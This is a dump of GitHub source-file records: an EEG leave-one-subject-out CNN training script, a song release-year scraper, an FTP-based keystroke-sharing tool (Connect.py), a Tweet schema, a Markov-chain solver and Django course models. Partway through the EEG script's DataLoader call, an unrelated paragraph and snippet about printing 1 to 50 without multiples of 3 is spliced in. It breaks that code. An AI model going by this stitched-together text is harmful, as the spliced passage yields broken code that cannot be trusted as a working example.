shape\",subIdx.shape)\n print(max(subIdx))\n x_data = np.swapaxes(x_data, 2, 0)\n y_data = np.swapaxes(y_data, 1, 0)\n subIdx = np.swapaxes(subIdx, 1, 0)\n print(y_data[0:600, 1:4])\n print('x_data.shape: ', x_data.shape)\n print('y_data.shape: ', y_data.shape)\n #label.astype(int)\n subIdx.astype(int)\n\n X_train_org, X_test_org, y_train_org, y_test_org = train_test_split(x_data, y_data, test_size=0.2, shuffle=True,random_state=42)\n samplenum = y_data.shape[0]\n label = y_data[:, 0]\n print(\"laaaaaaaaaaabel\",label.shape)\n\n channelnum = 19\n subjnum = 120\n samplelength = 4\n sf = 128\n\n lr = 1e-2\n batch_size = 50\n n_epoch = 6\n\n # ydata contains the label of samples\n ydata = np.zeros(samplenum, dtype=np.longlong)\n\n for i in range(samplenum):\n ydata[i] = label[i]\n\n # only channel 5 is used, which corresponds to the Fz channel\n selectedchan = [5]\n\n # update the xdata and channel number\n xdata = x_data[:, selectedchan, :]\n channelnum = len(selectedchan)\n\n # the result stores accuracies of every subject\n results = np.zeros(subjnum)\n\n # it performs leave-one-subject-out training and classfication\n for i in range(1, subjnum + 1):\n\n # form the training data all subjects except i\n trainindx = np.where(subIdx != i)[0]\n xtrain = xdata[trainindx]\n x_train = xtrain.reshape(xtrain.shape[0], 1, channelnum, samplelength * sf)\n y_train = ydata[trainindx]\n\n # form the testing data subject i\n testindx = np.where(subIdx == i)[0]\n xtest = xdata[testindx]\n x_test = xtest.reshape(xtest.shape[0], 1, channelnum, samplelength * sf)\n y_test = ydata[testindx]\n\n train = torch.utils.data.TensorDataset(torch.from_numpy(x_train), torch.from_numpy(y_train))\n train_loader = torch.utils.data.DataLoader(train, 
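Problem 4 above asks for the numbers 1 through 50 with multiples of 3 skipped (translating the Korean prompt). The counter-plus-dummy-loop version works; ranging directly over the values is the more idiomatic equivalent:

for e in range(1, 51):
    if e % 3 != 0:
        print(e)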
batch_size=batch_size, shuffle=True)\n\n # load the CNN model to deal with 1D EEG signals\n my_net = CompactCNN().double()\n\n optimizer = optim.Adam(my_net.parameters(), lr=lr)\n loss_class = torch.nn.NLLLoss()\n\n for p in my_net.parameters():\n p.requires_grad = True\n\n # train the classifier\n for epoch in range(n_epoch):\n for j, data in enumerate(train_loader, 0):\n inputs, labels = data\n\n input_data = inputs\n class_label = labels\n\n my_net.zero_grad()\n my_net.train()\n\n class_output = my_net(input_data)\n err_s_label = loss_class(class_output, class_label)\n err = err_s_label\n\n err.backward()\n optimizer.step()\n\n # test the results\n my_net.train(False)\n with torch.no_grad():\n x_test = torch.DoubleTensor(x_test)\n answer = my_net(x_test)\n probs = answer.cpu().numpy()\n preds = probs.argmax(axis=-1)\n acc = accuracy_score(y_test, preds)\n\n print(acc)\n results[i - 1] = acc\n\n print('mean accuracy:', np.mean(results))\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"ahmedguebsi/XAI_ADHD_Detection","sub_path":"adhd_deep/loo_cv.py","file_name":"loo_cv.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74392291687","text":"#release_history.py\nimport json\n\nfrom bs4 import BeautifulSoup\nfrom analytic import Analytic\nimport requests\nimport re\n\nclass ReleaseHistory(Analytic):\n\n def analyze(self):\n \"\"\"\n This analytic subclass takes the list of song urls and iterates through them\n scraping the release date of each song from the web page and returning it as an\n integer.\n :return: The\n \"\"\"\n date_dictionary = {}\n for url in self.url_list:\n page = requests.get(url)\n html = BeautifulSoup(page.text, 'html.parser')\n date = html.select('.metadata_unit .metadata_unit-info--text_only')\n if date:\n for i in date:\n i = str(i)\n result = re.findall(r\"\\d{4,}\", i)\n if result:\n year = int(result[0])\n if year in date_dictionary:\n date_dictionary[year] += 1\n else:\n date_dictionary[year] = 1\n return json.dumps(date_dictionary)\n\n\n# s = ''\n# result = re.findall(r\"\\d{4,}\", s)\n# print(result)","repo_name":"jos6654/sicc-song-analytics","sub_path":"analytics/release_history.py","file_name":"release_history.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16417999432","text":"import ftplib\n\n\nimport time\n\n\nglobal oldmsg\nglobal themsg\noldmsg = ''\n\nglobal oldid\nglobal theid\noldid = ''\n\nimport wget\nimport os\nimport keyboard\nimport mouse\nimport autopy\n\n\nglobal downloadedfilepath\n\nglobal status\nstatus = True\n\n\n\nfilename = 'log.txt'\n\nglobal FTPaddress\nFTPaddress = ''\nglobal FTPusername\nFTPusername = ''\nglobal FTPpassword\nFTPpassword = ''\nglobal FTPdestinationdirectoryname\nFTPdestinationdirectoryname = ''\nglobal Addressoflogfileonserver\nAddressoflogfileonserver = ''\n\n\n\n\ndef config():\n global FTPaddress \n global FTPusername\n global FTPpassword\n global FTPdestinationdirectoryname\n global Addressoflogfileonserver\n try:\n \n #first get the FTP credentials\n lines = []\n f = open('config.txt')\n for line in f:\n lines.append(line.rstrip('\\n'))\n f.close()\n \n \n FTPaddress = str(lines[0])\n FTPusername = str(lines[1])\n FTPpassword = str(lines[2])\n FTPdestinationdirectoryname = str(lines[3])\n Addressoflogfileonserver = str(lines[4])\n\n \n \n \n \n \n \n \n #print(FTPaddress + FTPusername + FTPpassword 
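The np.where(subIdx != i) masking in loo_cv.py above is exactly a leave-one-group-out split, and scikit-learn ships the same iteration ready-made. A sketch reusing the script's xdata, ydata and subIdx arrays:

from sklearn.model_selection import LeaveOneGroupOut

logo = LeaveOneGroupOut()
for train_idx, test_idx in logo.split(xdata, ydata, groups=subIdx.ravel()):
    x_train, x_test = xdata[train_idx], xdata[test_idx]
    y_train, y_test = ydata[train_idx], ydata[test_idx]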
+ FTPdestinationdirectoryname + Addressoflogfileonserver)\n #fs.close()\n return 'done'\n \n except:\n print(\"An exception was thrown. Please Check whether config.txt file is in directory with the correct information.\")\n answer = input('Do you like to continue: (y/n)')\n if answer == 'n' or answer == 'N':\n print('Closing the App..')\n return 'close'\n \n else:\n print(\"Restarting the App..\")\n return 'restart'\n \n \n\ndef startapp():\n\n #config \n configresult = config() \n if configresult == 'done':\n \n #get input\n answer = input('Hello there. Are you client or server?')\n if answer == 'server' or answer == 'Server':\n print('Server is running. Go open JustShareKeys.py to start sharing your keys.')\n #os.system('JustShareKeys.py')\n runserver()\n \n elif answer == 'client' or answer == 'Client':\n runclient()\n \n elif configresult == 'restart':\n startapp()\n \n elif configresult == 'close':\n pass\n \n \n \n\ndef runserver():\n global status\n global oldmsg\n global oldid\n global theid\n global FTPaddress \n global FTPusername\n global FTPpassword\n global FTPdestinationdirectoryname\n global Addressoflogfileonserver\n\n # f = open(\"log.txt\", \"r\")\n # lines = f.readlines()\n # lineid = lines[0]\n # linekey = lines[1]\n\n # theid = lineid\n # if theid != oldid:\n # oldid = theid\n \n #revert the try\n try:\n\n while status == True:\n f = open(\"log.txt\", \"r\")\n lines = f.readlines()\n lineid = lines[0]\n linekey = lines[1]\n theid = lineid\n # print('The key is: ' + linekey)\n # print('The id is: ' + lineid)\n \n # if theid != oldid:\n # oldid = theid\n \n if lineid != oldid and \"Num\" not in linekey :\n \n \n ftp = ftplib.FTP(FTPaddress)\n \n ftp.login(FTPusername,FTPpassword)\n \n #print(ftp.pwd())\n ftp.cwd('public_html')\n #print(ftp.pwd())\n \n ftp.cwd(FTPdestinationdirectoryname)\n ##print(ftp.pwd())\n \n print('The key pressed is: ' + linekey)\n oldid = lineid\n myfile = open(\"log.txt\",'rb')\n ftp.storlines('STOR ' + filename , myfile)\n \n elif \"Num\" in linekey and lineid != oldid: \n ftp = ftplib.FTP(FTPaddress)\n \n \n ftp.login(FTPusername,FTPpassword)\n \n #print(ftp.pwd())\n ftp.cwd('public_html')\n #print(ftp.pwd())\n ftp.cwd(FTPdestinationdirectoryname)\n ##print(ftp.pwd())\n \n print('The key pressed is: ' + linekey)\n oldid = theid\n f.close()\n myfile = open(\"log.txt\",'rb')\n ftp.storlines('STOR ' + filename , myfile)\n \n print('Numlock was pressed. The operation is on pause!')\n answer = input('Would you like to proceed the connection (answer: y/n)?')\n if answer == 'n' or answer == 'N':\n print('You are now disconnected. 
To start the server rerun the app.')\n status = False\n \n \n f.close()\n time.sleep(0.001)\n \n #revert \n except:\n time.sleep(0.001)\n \n runserver()\n\n #print(\"An exception occurred\")\n #IndexError()\n\n\n\n\ndef runclient():\n global status\n global oldmsg\n global oldid\n global theid\n global downloadedfilepath\n try:\n while status == True:\n downloadedfilepath = wget.download(Addressoflogfileonserver)\n f = open(downloadedfilepath, \"r\")\n lines = f.readlines()\n lineid = lines[0]\n linekey = lines[1]\n linemouseposition = lines[2]\n theid = lineid\n\n\n f.close()\n os.remove(downloadedfilepath)\n if lineid != oldid:\n #keyboard and mouse click if and if\n print(linekey)\n oldid = lineid\n\n if(\"pace\" in str(linekey)):\n print('Now Space should be pressed!')\n keyboard.send(\"space\")\n\n elif(\"nter\" in str(linekey)):\n print('Now Enter should be pressed!')\n keyboard.send(\"enter\")\n\n elif(\"MB\" in str(linekey)):\n print('Now LMB should be pressed!')\n mouse.click(button='left')\n\n elif(\"sc\" in str(linekey)):\n print('Now Esc should be pressed!')\n keyboard.send(\"escape\")\n\n elif(\"hift\" in str(linekey)):\n\n positionarr = linemouseposition.split(' ')\n print('Shift was pressed. Mouse moves to: ' + 'X = ' + positionarr[0] + ' , Y = ' + positionarr[1] )\n autopy.mouse.smooth_move(int(positionarr[0]),int(positionarr[1])) #smooth move is slow\n #autopy.mouse.move(int(positionarr[0]),int(positionarr[1]))\n\n elif(\"eft\" in str(linekey)):\n print('Now Left arrow button should be pressed!')\n keyboard.send(\"left\")\n\n elif(\"ight\" in str(linekey)):\n print('Now Right arrow button should be pressed!')\n keyboard.send(\"right\")\n\n#never pause the client you should only close the tab to end\n elif(\"umLock\" in str(linekey)):\n print('host paused/unpaused the connection.')\n## answer = input('Would you like to proceed the connection (answer: y/n)?')\n## if answer == 'n' or answer == 'N':\n## print('You are now disconnected. 
To start the client rerun the app.')\n## status = False\n except:\n try:\n f.close()\n os.remove(downloadedfilepath)\n time.sleep(0.001)\n runclient()\n\n except FileNotFoundError:\n time.sleep(0.001)\n runclient()\n\n except:\n time.sleep(0.001)\n runclient()\n\n\n\n\n\n#program\n\nstartapp()\n\n","repo_name":"farzammadani/JustShareKeys","sub_path":"Connect.py","file_name":"Connect.py","file_ext":"py","file_size_in_byte":8089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74473444327","text":"from pydantic import BaseModel, Field\nfrom typing import Optional\nfrom datetime import date\n\n\nclass Tweet(BaseModel):\n\n id: Optional[int] = None\n body: str = Field(min_length=1, max_length=140)\n comments_count: Optional[int] = 0\n created_time: date\n user_id: int\n\n class Config:\n schema_extra = {\n \"example\":{\n \"body\":\"Put here your tweet\",\n \"created_time\":\"2023-03-10 10:10:10\",\n \"user_id\": 0\n }\n }","repo_name":"efdree/py-api-tweetable","sub_path":"schemas/tweet.py","file_name":"tweet.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14043859130","text":"#MARKOV CHAINS and absorbing states - theory\nfrom fractions import Fraction\n\ndef get_transition_matrix(m,absorbing,non_absorbing):\n p = [] #in order to use MARKOV CHAINS it's important to have separated absorbing states from non-absorbing ones\n row = absorbing + non_absorbing\n\n for i, rowNumber in enumerate(absorbing):\n p.append(m[rowNumber])\n p[i][i] = 1\n\n for nonAbsorbingI in non_absorbing:\n orderedRow = []\n for orderI in row:\n orderedRow.append(m[nonAbsorbingI][orderI])\n fractionRow = []\n for col in orderedRow:\n fractionRow.append(col/ float(sum(orderedRow)))\n p.append(fractionRow)\n\n return p\n\ndef extract_matrices(m,t,s):\n q,r = [],[]\n for row in range(s, s+t):\n q.append(m[row][s:])\n r.append(m[row][:s])\n\n return q,r\n\ndef get_submatrix(m,i,j):\n sub = []\n for x in m[:i]+m[i+1:]:\n l = []\n for y in x[:j]+x[j+1:]:\n l.append(y)\n sub.append(l)\n return sub\n\ndef get_determinant(q):\n l = len(q)\n if l == 2:\n return q[0][0]*q[1][1] - q[0][1]*q[1][0]\n\n det = 0\n for i in range(l):\n det += ((-1)**i) * q[0][i] * get_determinant(get_submatrix(q,0,i))\n\n return det\n\ndef get_transpose(m):\n mt = []\n r = len(m)\n if r > 0:\n c = len(m[0])\n for j in range(c):\n l = []\n for i in range(r):\n l.append(m[i][j])\n mt.append(l)\n\n return mt\n\ndef get_inverse(q):\n det = get_determinant(q)\n\n if len(q) == 2:\n return [[q[1][1]/det, -1*q[0][1]/det],\n [-1*q[1][0]/det, q[0][0]/det]]\n\n cofactors = []\n for r in range(len(q)):\n cofactorRow = []\n for c in range(len(m)):\n cofactorRow.append(((-1)**(r+c)) * get_determinant(get_submatrix(q,r,c)))\n cofactors.append(cofactorRow)\n cofactors = get_transpose(cofactors)\n for r in range(len(cofactors)):\n for c in range(len(cofactors)):\n cofactors[r][c] /= det\n return cofactors\n\ndef multiply_matrices(n,r):\n prod = []\n x1,x2 = len(n),len(r)\n\n if x1>0 and x2>0 and len(n[0])==x2:\n x3 = len(r[0])\n for i in range(x1):\n tmp = []\n for j in range(x3):\n tot = 0\n for k in range(x2):\n tot += n[i][k]*r[k][j]\n tmp.append(tot)\n prod.append(tmp)\n\n return prod\n\ndef get_fundamental_matrix(q,t):\n for i in range(t):\n for j in range(t):\n k = 0\n if i == j:\n k = 1\n q[i][j] = k - q[i][j]\n # Q -> Id_t - Q\n \n inv = get_inverse(q) # Q^-1\n \n return inv\n\ndef get_mcm(a,b):\n m 
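Connect.py above retries by recursion: runserver and runclient call themselves inside their except blocks, so a long run of errors will eventually hit Python's default recursion limit (about 1000 frames). A hedged loop-based alternative with the same sleep-and-retry behavior:

import time

def run_with_retry(task, delay=0.001):
    # Retry forever without growing the call stack.
    while True:
        try:
            task()
            break
        except Exception:
            time.sleep(delay)

# e.g. run_with_retry(runserver) or run_with_retry(runclient)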
= max([a,b])\n while m % a != 0 or m % b != 0:\n m += 1\n return m\n\ndef get_result(m,s):\n num = []\n den = []\n res = [0] * (s+1)\n mcm = 1\n for i in range(s):\n x = Fraction(m[i]).limit_denominator()\n num.append(x.numerator)\n den.append(x.denominator)\n mcm = get_mcm(mcm,x.denominator)\n\n res[s] = mcm\n\n for i in range(s):\n res[i] = int(mcm/den[i]) * num[i]\n\n return res\n\ndef solution(m):\n l = len(m)\n absorbing_order,non_absorbing_order = [],[]\n\n for i, row in enumerate(m):\n if(max(row) == 0):\n absorbing_order.append(i)\n else:\n non_absorbing_order.append(i)\n \n if len(absorbing_order) == 1:\n return [1, 1]\n\n s = len(absorbing_order)\n t = l - s\n transition_matrix = get_transition_matrix(m,absorbing_order,non_absorbing_order)\n #extract Q and R\n # \n # TM = | Q R | Q is t x t, R is t x s\n # | 0 ID |\n q, r = extract_matrices(transition_matrix,t,s)\n #compute N = (Id - Q)^-1\n n = get_fundamental_matrix(q,t)\n #finally compute M = N R, M_ij contains prob of being absorbed in state j after starting from state i\n # we do focus only on i=0! column M_0j\n\n m = multiply_matrices(n,r) #np.dot(n,r)\n\n #equalize m denominators before and converting to result\n res = get_result(m[0],s)\n return res\n\nm = [\n [0,1,0,0,0,1], # s0, the initial state, goes to s1 and s5 with equal probability\n [4,0,0,3,2,0], # s1 can become s0, s3, or s4, but with different probabilities\n [0,0,0,0,0,0], # s2 is terminal, and unreachable (never observed in practice)\n [0,0,0,0,0,0], # s3 is terminal\n [0,0,0,0,0,0], # s4 is terminal\n [0,0,0,0,0,0], # s5 is terminal\n]\ns = [[0, 2, 1, 0, 0], [0, 0, 0, 3, 4], [0, 0, 0, 0, 0], [0, 0, 0, 0,0], [0, 0, 0, 0, 0]]\nprint(solution(s))\nprint(solution(m))","repo_name":"matteosz/foo.bar","sub_path":"Level 3/Doomsday Fuel/main_no_np.py","file_name":"main_no_np.py","file_ext":"py","file_size_in_byte":4585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"86297330970","text":"from django.contrib.contenttypes.fields import GenericForeignKey, GenericRelation\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db.models import Q\nfrom django.utils.safestring import mark_safe\nfrom django.db import models\nimport hashlib\n\n\nclass CourseCategory(models.Model):\n \"\"\"课程大类, e.g 前端 后端...\"\"\"\n name = models.CharField(max_length=64, unique=True)\n\n def __str__(self):\n return \"%s\" % self.name\n\n class Meta:\n verbose_name = \"课程大类\"\n verbose_name_plural = \"课程大类\"\n\n\nclass CourseSubCategory(models.Model):\n \"\"\"课程子类, e.g python linux \"\"\"\n category = models.ForeignKey(\"CourseCategory\")\n name = models.CharField(max_length=64, unique=True)\n\n def __str__(self):\n return \"%s\" % self.name\n\n class Meta:\n verbose_name = \"课程子类\"\n verbose_name_plural = \"课程子类\"\n\n\nclass DegreeCourse(models.Model):\n \"\"\"学位课程\"\"\"\n name = models.CharField(max_length=128, unique=True)\n course_img = models.CharField(max_length=255, verbose_name=\"缩略图\")\n brief = models.TextField(verbose_name=\"学位课程简介\", )\n total_scholarship = models.PositiveIntegerField(verbose_name=\"总奖学金(贝里)\", default=40000)\n mentor_compensation_bonus = models.PositiveIntegerField(verbose_name=\"本课程的导师辅导费用(贝里)\", default=15000)\n # 用于GenericForeignKey反向查询, 不会生成表字段,切勿删除\n coupon = GenericRelation(\"Coupon\")\n # 为了计算学位奖学金\n period = models.PositiveIntegerField(verbose_name=\"建议学习周期(days)\", default=150)\n prerequisite = models.TextField(verbose_name=\"课程先修要求\", max_length=1024)\n teachers = 
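One apparent slip in get_inverse above: the inner cofactor loop ranges over len(m), the module-level test matrix, rather than len(q). It goes unnoticed here only because both sample boards reduce to 2x2 Q blocks, which take the early-return branch and never reach the cofactor path. The corrected loop:

    cofactors = []
    for r in range(len(q)):
        cofactorRow = []
        for c in range(len(q)):  # was len(m): a module-level global
            cofactorRow.append(((-1) ** (r + c)) * get_determinant(get_submatrix(q, r, c)))
        cofactors.append(cofactorRow)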
models.ManyToManyField(\"Teacher\", verbose_name=\"课程讲师\")\n # 用于GenericForeignKey反向查询,不会生成表字段,切勿删除\n degreecourse_price_policy = GenericRelation(\"PricePolicy\")\n\n def __str__(self):\n return self.name\n\n\nclass Scholarship(models.Model):\n \"\"\"学位课程奖学金\"\"\"\n degree_course = models.ForeignKey(\"DegreeCourse\")\n time_percent = models.PositiveSmallIntegerField(verbose_name=\"奖励档位(时间百分比)\", help_text=\"只填百分值,如80,代表80%\")\n value = models.PositiveIntegerField(verbose_name=\"奖学金数额\")\n\n def __str__(self):\n return \"%s:%s\" % (self.degree_course, self.value)\n\n\nclass Course(models.Model):\n \"\"\"课程\"\"\"\n name = models.CharField(max_length=128, unique=True)\n course_img = models.CharField(max_length=255)\n sub_category = models.ForeignKey(\"CourseSubCategory\")\n course_type_choices = ((0, '付费'), (1, 'VIP专享'), (2, '学位课程'))\n course_type = models.SmallIntegerField(choices=course_type_choices)\n degree_course = models.ForeignKey(\"DegreeCourse\", blank=True, null=True, help_text=\"若是学位课程,此处关联学位表\")\n brief = models.TextField(verbose_name=\"课程概述\", max_length=2048)\n level_choices = ((0, '初级'), (1, '中级'), (2, '高级'))\n level = models.SmallIntegerField(choices=level_choices, default=1)\n pub_date = models.DateField(verbose_name=\"发布日期\", blank=True, null=True)\n period = models.PositiveIntegerField(verbose_name=\"建议学习周期(days)\", default=7)\n order = models.IntegerField(\"课程顺序\", help_text=\"从上一个课程数字往后排\")\n attachment_path = models.CharField(max_length=128, verbose_name=\"课件路径\", blank=True, null=True)\n status_choices = ((0, '上线'), (1, '下线'), (2, '预上线'))\n status = models.SmallIntegerField(choices=status_choices, default=0)\n template_id = models.SmallIntegerField(\"前端模板id\", default=1)\n coupon = GenericRelation(\"Coupon\")\n # 用于GenericForeignKey反向查询,不会生成表字段,切勿删除\n price_policy = GenericRelation(\"PricePolicy\")\n\n def __str__(self):\n return \"%s(%s)\" % (self.name, self.get_course_type_display())\n\n def save(self, *args, **kwargs):\n if self.course_type == 2:\n if not self.degree_course:\n raise ValueError(\"学位课程必须关联对应的学位表\")\n super(Course, self).save(*args, **kwargs)\n\n\nclass CourseDetail(models.Model):\n \"\"\"课程详情页内容\"\"\"\n course = models.OneToOneField(\"Course\")\n hours = models.IntegerField(\"课时\")\n course_slogan = models.CharField(max_length=125, blank=True, null=True)\n video_brief_link = models.CharField(verbose_name='课程介绍', max_length=255, blank=True, null=True)\n why_study = models.TextField(verbose_name=\"为什么学习这门课程\")\n what_to_study_brief = models.TextField(verbose_name=\"我将学到哪些内容\")\n career_improvement = models.TextField(verbose_name=\"此项目如何有助于我的职业生涯\")\n prerequisite = models.TextField(verbose_name=\"课程先修要求\", max_length=1024)\n recommend_courses = models.ManyToManyField(\"Course\", related_name=\"recommend_by\", blank=True)\n teachers = models.ManyToManyField(\"Teacher\", verbose_name=\"课程讲师\")\n\n def __str__(self):\n return \"%s\" % self.course\n\n\nclass OftenAskedQuestion(models.Model):\n \"\"\"常见问题\"\"\"\n content_type = models.ForeignKey(ContentType,\n limit_choices_to={'model__contains': 'course'}) # 关联course or degree_course\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n\n question = models.CharField(max_length=255)\n answer = models.TextField(max_length=1024)\n\n def __str__(self):\n return \"%s-%s\" % (self.content_object, self.question)\n\n class Meta:\n unique_together = ('content_type', 'object_id', 'question')\n\n\nclass CourseOutline(models.Model):\n \"\"\"课程大纲\"\"\"\n 
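# 每个课程详情页可挂多条大纲;title 在同一详情页内唯一(见 Meta.unique_together),order 决定前端显示顺序\n    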
course_detail = models.ForeignKey(\"CourseDetail\")\n title = models.CharField(max_length=128)\n # 前端显示顺序\n order = models.PositiveSmallIntegerField(default=1)\n\n content = models.TextField(\"内容\", max_length=2048)\n\n def __str__(self):\n return \"%s\" % self.title\n\n class Meta:\n unique_together = ('course_detail', 'title')\n\n\nclass CourseChapter(models.Model):\n \"\"\"课程章节\"\"\"\n course = models.ForeignKey(\"Course\", related_name='coursechapters')\n chapter = models.SmallIntegerField(verbose_name=\"第几章\", default=1)\n name = models.CharField(max_length=128)\n summary = models.TextField(verbose_name=\"章节介绍\", blank=True, null=True)\n pub_date = models.DateField(verbose_name=\"发布日期\", auto_now_add=True)\n\n class Meta:\n unique_together = (\"course\", 'chapter')\n\n def __str__(self):\n return \"%s:(第%s章)%s\" % (self.course, self.chapter, self.name)\n\n\nclass Teacher(models.Model):\n \"\"\"讲师、导师表\"\"\"\n name = models.CharField(max_length=32)\n role_choices = ((0, '讲师'), (1, '导师'))\n role = models.SmallIntegerField(choices=role_choices, default=0)\n title = models.CharField(max_length=64, verbose_name=\"职位、职称\")\n signature = models.CharField(max_length=255, help_text=\"导师签名\", blank=True, null=True)\n image = models.CharField(max_length=128)\n brief = models.TextField(max_length=1024)\n\n def __str__(self):\n return self.name\n\n\nclass PricePolicy(models.Model):\n \"\"\"价格与有课程效期表\"\"\"\n content_type = models.ForeignKey(ContentType) # 关联course or degree_course\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n\n # course = models.ForeignKey(\"Course\")\n valid_period_choices = ((1, '1天'), (3, '3天'),\n (7, '1周'), (14, '2周'),\n (30, '1个月'),\n (60, '2个月'),\n (90, '3个月'),\n (180, '6个月'), (210, '12个月'),\n (540, '18个月'), (720, '24个月'),\n )\n valid_period = models.SmallIntegerField(choices=valid_period_choices)\n price = models.FloatField()\n\n class Meta:\n unique_together = (\"content_type\", 'object_id', \"valid_period\")\n\n def __str__(self):\n return \"%s(%s)%s\" % (self.content_object, self.get_valid_period_display(), self.price)\n\n\nclass CourseSection(models.Model):\n \"\"\"课时目录\"\"\"\n chapter = models.ForeignKey(\"CourseChapter\", related_name='coursesections')\n name = models.CharField(max_length=128)\n order = models.PositiveSmallIntegerField(verbose_name=\"课时排序\", help_text=\"建议每个课时之间空1至2个值,以备后续插入课时\")\n section_type_choices = ((0, '文档'), (1, '练习'), (2, '视频'))\n section_type = models.SmallIntegerField(default=2, choices=section_type_choices)\n section_link = models.CharField(max_length=255, blank=True, null=True, help_text=\"若是video,填vid,若是文档,填link\")\n video_time = models.CharField(verbose_name=\"视频时长\", blank=True, null=True, max_length=32) # 仅在前端展示使用\n pub_date = models.DateTimeField(verbose_name=\"发布时间\", auto_now_add=True)\n free_trail = models.BooleanField(\"是否可试看\", default=False)\n\n class Meta:\n unique_together = ('chapter', 'section_link')\n\n def __str__(self):\n return \"%s-%s\" % (self.chapter, self.name)\n\n\nclass CourseReview(models.Model):\n \"\"\"课程评价\"\"\"\n enrolled_course = models.OneToOneField(\"EnrolledCourse\")\n about_teacher = models.FloatField(default=0, verbose_name=\"讲师讲解是否清晰\")\n about_video = models.FloatField(default=0, verbose_name=\"内容实用\")\n about_course = models.FloatField(default=0, verbose_name=\"课程内容通俗易懂\")\n review = models.TextField(max_length=1024, verbose_name=\"评价\")\n disagree_number = models.IntegerField(default=0, verbose_name=\"踩\")\n agree_number = 
models.IntegerField(default=0, verbose_name="赞同数")\n    tags = models.ManyToManyField("Tags", blank=True, verbose_name="标签")\n    date = models.DateTimeField(auto_now_add=True, verbose_name="评价日期")\n    is_recommend = models.BooleanField("热评推荐", default=False)\n    hide = models.BooleanField("不在前端页面显示此条评价", default=False)\n\n    def __str__(self):\n        return "%s-%s" % (self.enrolled_course.course, self.review)\n\n\nclass DegreeCourseReview(models.Model):\n    """学位课程评价\n    为了以后可以定制单独的评价内容,所以不与普通课程的评价混在一起,单独建表\n    """\n    enrolled_course = models.ForeignKey("EnrolledDegreeCourse")\n    course = models.ForeignKey("Course", verbose_name="评价学位模块", blank=True, null=True,\n                               help_text="不填写即代表评价整个学位课程", limit_choices_to={'course_type': 2})\n    about_teacher = models.FloatField(default=0, verbose_name="讲师讲解是否清晰")\n    about_video = models.FloatField(default=0, verbose_name="视频质量")\n    about_course = models.FloatField(default=0, verbose_name="课程")\n    review = models.TextField(max_length=1024, verbose_name="评价")\n    disagree_number = models.IntegerField(default=0, verbose_name="踩")\n    agree_number = models.IntegerField(default=0, verbose_name="赞同数")\n    tags = models.ManyToManyField("Tags", blank=True, verbose_name="标签")\n    date = models.DateTimeField(auto_now_add=True, verbose_name="评价日期")\n    is_recommend = models.BooleanField("热评推荐", default=False)\n    hide = models.BooleanField("不在前端页面显示此条评价", default=False)\n\n    def __str__(self):\n        return "%s-%s" % (self.enrolled_course, self.review)\n\n\nclass Homework(models.Model):\n    chapter = models.ForeignKey("CourseChapter")\n    title = models.CharField(max_length=128, verbose_name="作业题目")\n    order = models.PositiveSmallIntegerField("作业顺序", help_text="同一课程的每个作业之前的order值间隔1-2个数")\n    homework_type_choices = ((0, '作业'), (1, '模块通关考核'))\n    homework_type = models.SmallIntegerField(choices=homework_type_choices, default=0)\n    requirement = models.TextField(max_length=1024, verbose_name="作业需求")\n    threshold = models.TextField(max_length=1024, verbose_name="踩分点")\n    recommend_period = models.PositiveSmallIntegerField("推荐完成周期(天)", default=7)\n    scholarship_value = models.PositiveSmallIntegerField("为该作业分配的奖学金(贝里)")\n    note = models.TextField(blank=True, null=True)\n    enabled = models.BooleanField(default=True, help_text="本作业如果后期不需要了,不想让学员看到,可以设置为False")\n\n    class Meta:\n        unique_together = ("chapter", "title")\n\n    def __str__(self):\n        return "%s - %s" % (self.chapter, self.title)\n\n\nclass ArticleSource(models.Model):\n    """文章来源"""\n    name = models.CharField(max_length=64, unique=True)\n\n    def __str__(self):\n        return self.name\n\n\nclass Article(models.Model):\n    """文章资讯"""\n    title = models.CharField(max_length=255, unique=True, db_index=True, verbose_name="标题")\n    source = models.ForeignKey("ArticleSource", verbose_name="来源")\n    article_type_choices = ((0, '资讯'), (1, '视频'))\n    article_type = models.SmallIntegerField(choices=article_type_choices, default=0)\n    brief = models.TextField(max_length=512, verbose_name="摘要")\n    head_img = models.CharField(max_length=255)\n    content = models.TextField(verbose_name="文章正文")\n    pub_date = models.DateTimeField(verbose_name="上架日期")\n    offline_date = models.DateTimeField(verbose_name="下架日期")\n    status_choices = ((0, '在线'), (1, '下线'))\n    status = models.SmallIntegerField(choices=status_choices, default=0, verbose_name="状态")\n    order = models.SmallIntegerField(default=0, verbose_name="权重", help_text="文章想置顶,可以把数字调大,不要超过1000")\n    vid = models.CharField(max_length=128, verbose_name="视频VID", 
help_text=\"文章类型是视频, 则需要添加视频VID\", blank=True, null=True)\n comment_num = models.SmallIntegerField(default=0, verbose_name=\"评论数\")\n agree_num = models.SmallIntegerField(default=0, verbose_name=\"点赞数\")\n view_num = models.SmallIntegerField(default=0, verbose_name=\"观看数\")\n collect_num = models.SmallIntegerField(default=0, verbose_name=\"收藏数\")\n\n tags = models.ManyToManyField(\"Tags\", blank=True, verbose_name=\"标签\")\n date = models.DateTimeField(auto_now_add=True, verbose_name=\"创建日期\")\n\n position_choices = ((0, '信息流'), (1, 'banner大图'), (2, 'banner小图'))\n position = models.SmallIntegerField(choices=position_choices, default=0, verbose_name=\"位置\")\n comment = GenericRelation(\"Comment\") # 用于GenericForeignKey反向查询, 不会生成表字段,切勿删除,如有疑问请联系老村长\n\n def __str__(self):\n return \"%s-%s\" % (self.source, self.title)\n\n\nclass Collection(models.Model):\n \"\"\"收藏\"\"\"\n content_type = models.ForeignKey(ContentType)\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n account = models.ForeignKey(\"Account\")\n date = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n unique_together = ('content_type', 'object_id', 'account')\n\n\nclass 